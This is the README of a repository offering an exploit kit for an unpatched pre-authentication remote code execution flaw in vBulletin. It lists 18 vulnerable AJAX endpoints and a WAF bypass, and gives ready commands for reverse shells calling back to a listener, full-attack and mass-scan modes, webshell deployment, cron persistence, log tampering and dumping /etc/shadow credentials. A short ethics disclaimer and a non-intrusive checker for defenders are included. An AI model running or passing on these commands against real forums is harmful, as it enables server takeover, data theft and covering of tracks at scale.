
CVE-2026-61511 – vBulletin RCE pré-authentification (CVSS 9.8). Vuln 5.x/6.x (non corrigé). Multi-exploit via Endpoint Pool, AJAX, contournement WAF PHPFuck. Kit complet : reverse shell, proxy, persistance, webshell, opérations base de données, contrôle du pare-feu, gestion des journaux, scan de masse. 2 versions : multi-exploit et vérification sûre. Python 3.8+ Utilisez de manière éthique, restez légal. 🔒

⚠️ UTILISATION ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS
Ce dépôt fournit des outils destinés uniquement aux professionnels de la sécurité autorisés, aux équipes bleues et aux testeurs d'intrusion.
L'accès non autorisé à des systèmes informatiques est illégal en vertu de la CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et des lois similaires dans le monde entier.
CVE‑2026‑61511 est une faille d'injection PHP eval() dans le moteur de rendu de modèles AJAX de vBulletin.
Versions concernées : 5.0.0 – 5.7.5 et 6.0.0 – 6.2.1.
Points d'attaque multiples – le bug existe dans plusieurs gestionnaires AJAX :
/ajax/render/pagenav/ajax/api/ad/replaceAdTemplate/ajax/render/widget_php/ajax/render/widget_tabbedcontainer_tab_panel/ajax/api/content_* /getIndexableContentEncodage PHPFuck – la charge utile est transformée en une séquence d'opérateurs et de nombres PHP qui contourne les filtres WAF et permet l'exécution de code PHP arbitraire.
Aucune authentification requise – un attaquant peut envoyer une requête POST forgée à n'importe quel point d'accès vulnérable et exécuter des commandes système avec les privilèges du serveur web.
Impact – compromission totale du serveur, vol de données, portes dérobées, mouvement latéral et persistance. Mettez à niveau la version !
| Outil | Objectif | Utilisateur visé |
|---|---|---|
exploit.py | Boîte à outils complète avec shell inversé, persistance, opérations sur fichiers, dump de base de données, gestion du pare-feu, gestion des journaux, redirection de ports, déploiement de clés SSH, scan réseau et scan de masse (multi‑thread). |
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt
Contenu de requirements.txt :
request
urllib3
Ce logiciel est fourni uniquement à des fins éducatives et pour des tests de sécurité autorisés.
| Équipes rouges / pentesteurs autorisés |
safecheck.py | Vérificateur non intrusif qui teste la vulnérabilité sans exécuter de charge utile malveillante. Détecte la version, teste tous les points d'accès et génère un rapport détaillé. | Équipes bleues / auditeurs de sécurité |
| Fonctionnalité | exploit.py | safecheck.py |
|---|
| Détection de vulnérabilité | ✅ | ✅ |
| Détection de version | ✅ | ✅ |
| Test multi‑points d'accès (18 chemins) | ✅ | ✅ |
| Exécution de commandes | ✅ | ❌ |
| Shell inversé | ✅ | ❌ |
| Téléversement/téléchargement de fichiers | ✅ | ❌ |
| Mécanismes de persistance | ✅ | ❌ |
| Déploiement de web shell | ✅ | ❌ |
| Opérations sur base de données | ✅ | ❌ |
| Collecte d'informations système | ✅ | ✅ |
| Gestion du pare-feu | ✅ | ❌ |
| Gestion des journaux | ✅ | ❌ |
| Redirection de ports | ✅ | ❌ |
| Déploiement de clés SSH | ✅ | ❌ |
| Scan réseau | ✅ | ❌ |
| Scan de masse (multi‑thread) | ✅ | ❌ |
| Prise en charge des proxys | ✅ | ✅ |
| Sortie de rapport JSON | ✅ | ✅ |
| Menu interactif | ✅ | ❌ |
| Mode non intrusif (sûr) | ❌ | ✅ |
| Mode verbeux/Débogage | ✅ | ✅ |
| Exécution de commandes personnalisées | ✅ | ❌ |
| Chaînage de commandes multiples | ✅ | ❌ |
| Lecture de fichiers distants | ✅ | ❌ |
| Écriture de fichiers distants | ✅ | ❌ |
| Gestion des utilisateurs système | ✅ | ❌ |
| Techniques de contournement du pare-feu | ✅ | ❌ |
| Évitement WAF (PHPFuck) | ✅ | ✅ |
| Scénario | Outil recommandé |
|---|
| Équipe bleue – vérification si votre installation vBulletin est vulnérable | safecheck.py |
| Audit de sécurité – évaluation de vulnérabilité non intrusive | safecheck.py |
| Équipe rouge – test d'intrusion autorisé avec exploitation complète | exploit.py |
| Bug Bounty – test de divulgation responsable | safecheck.py |
| Scan de masse – vérification de la vulnérabilité de plusieurs cibles | exploit.py (détection uniquement) |
| Réponse à incident – vérification si les systèmes sont compromis | safecheck.py |
| Paramètre | Description |
|---|
-t, --target | URL cible (ex. http://forum.com/vb) |
--proxy | Proxy HTTP (ex. http://127.0.0.1:8080) |
--timeout | Délai d'expiration des requêtes en secondes (défaut : 10) |
--retry | Nombre de tentatives par chemin (défaut : 3) |
--output | Enregistrer le rapport détaillé dans un fichier JSON |
-v, --verbose | Sortie verbeuse |
-q, --quiet | Mode silencieux (sortie minimale) |
--lhost | Requis pour l'exploit – IP pour le rappel |
--lport | Port pour le rappel (défaut : 4444) |
--threads | Threads pour le scan de masse (défaut : 5) |
--exploit | Effectuer l'exploitation après détection |
--full | Attaque complète (tous les modules) |
--shell | Démarrer un shell inversé |
--webshell | Installer un web shell (/shell.php) |
--persist | Installer la persistance (tâche cron) |
--dump | Dump de la base de données |
--dump-creds | Dump des identifiants (/etc/passwd, /etc/shadow) |
--interactive | Menu interactif après vérification réussie |
| # | Scénario | Commande |
|---|
| 1 | Vérification rapide de vulnérabilité | python safecheck.py -t http://target.com/vb |
| 2 | Scan détaillé avec rapport | python safecheck.py -t http://target.com/vb --output report.json -v |
| 3 | Shell inversé | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell |
| 4 | Attaque complète (tous les modules) | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full |
| 5 | Scan de masse depuis un fichier | python exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json |
| 6 | Mode menu interactif | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive |
| # | Point d'accès |
|---|
| 1 | /ajax/render/pagenav |
| 2 | /ajax/render/pagenav?template=page |
| 3 | /ajax/api/ad/replaceAdTemplate |
| 4 | /ajax/render/widget_php |
| 5 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 6 | /ajax/api/content_infraction/getIndexableContent |
| 7 | /ajax/api/content_video/getIndexableContent |
| 8 | /ajax/api/content_text/getIndexableContent |
| 9 | /ajax/api/content_report/getIndexableContent |
| 10 | /ajax/api/content_redirect/getIndexableContent |
| 11 | /ajax/api/content_privatemessage/getIndexableContent |
| 12 | /ajax/api/content_poll/getIndexableContent |
| 13 | /ajax/api/content_photo/getIndexableContent |
| 14 | /ajax/api/content_link/getIndexableContent |
| 15 | /ajax/api/content_gallery/getIndexableContent |
| 16 | /ajax/api/content_event/getIndexableContent |
| 17 | /ajax/api/content_channel/getIndexableContent |
| 18 | /ajax/api/content_attach/getIndexableContent |